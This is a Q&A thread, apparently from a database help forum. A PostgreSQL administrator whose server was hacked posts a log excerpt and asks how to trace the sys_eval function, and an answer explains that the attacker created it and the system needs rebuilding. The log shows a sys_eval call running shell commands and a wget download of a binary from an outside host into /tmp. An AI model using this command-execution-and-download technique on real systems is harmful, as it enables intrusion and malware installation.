PostgreSQL: How find functions that use sys_eval

postgresql-9.3Security

my server was hacked, I found this in the postgres log

2017-12-19 06:30:16 COT STATEMENT:  select sys_eval('pgrep baou87r1D9;pgrep 9rMhx24;pgrep Ps1fnYF3;pgrep P15xAw4;pgrep 8yV192n7;pgrep ktU5R693w2;pgrep VW5Ngjl;pgrep gwcaMW7;pgrep pvN195X8A;pgrep H80p3ao14Z;pgrep 6gBLwWlMrS;pgrep 78HgGw0L3;pgrep 5qKiw4e7gQ;pgrep iW35uqB60;pgrep qik7btShxK;pgrep xCi4Zze52;pgrep O0ajdnot;pgrep 6zmYcK1r;pgrep Hgb1hjvz;pgrep 38qz9Ivr;pgrep 0k693Runi;pgrep ax6fYNV;pgrep g3v50S64f7;pgrep 8y7kV496;pgrep 60m4qwFA;pgrep 0bs45q3k;pgrep 2R3e4g5l;pgrep 0a546q2T;pgrep c12yZ0v;pgrep KEq6m2kV5;');
--2017-12-19 06:31:09--  http://qwer.world/kw0rker

Resolviendo qwer.world... 138.197.116.216
Connecting to qwer.world|138.197.116.216|:80... conectado.
PeticiĆ³n HTTP enviada, esperando respuesta... 200 OK
Longitud: 1643240 (1.6M) [application/octet-stream]
Saving to: `/tmp/x0597078a'

     0K .......... .......... .......... .......... ..........  3%  397K 4s
    50K .......... .......... .......... .......... ..........  6%  793K 3s
   100K .......... .......... .......... .......... ..........  9%  794K 2s
   150K .......... .......... .......... .......... .......... 12% 59.9M 2s
   200K .......... .......... .......... .......... .......... 15%  800K 2s
   250K .......... .......... .......... .......... .......... 18% 83.3M 1s
   300K .......... .......... .......... .......... .......... 21%  807K 1s
   350K .......... .......... .......... .......... .......... 24% 84.6M 1s
   400K .......... .......... .......... .......... .......... 28% 7.91M 1s

I deleted the files in tmp, stopped an unknown postgres process, and changed firewall rules, pg_hba conf and password for database user.

I don't know if the malicious code still persists and I need reinstall my postgres installation. My plan was search the function and try to prevent future problems but the documentation I found for sys_eval is very limited.

How can I find where sys_eval is used in my existing code?

Best Answer

You can't find where sys_eval is used in our existing code, because this function does not exist on a clean system (unless you have gone out of your way to make it) so your code would have no reason to use it (unless of course your code-base was also hacked and had stuff inserted into it). The function was created by the hacker as one of the steps of hacking your database. The hacker could have called it anything he wanted. He probably got the code here or similar, and then was too lazy to obfuscate the names.

If you are looking for where it is on the poisoned system, look in pg_proc. But this system needs to be nuked from orbit, so there is probably no point in looking. The changes you will make (on your clean system) to pg_hba, the firewall, and the database users (including the database superusers, which is where the hack happened, not just the ordinary users) should prevent them from exploiting the new system, but there is no way of telling how many trojans and backdoors were installed in the old one.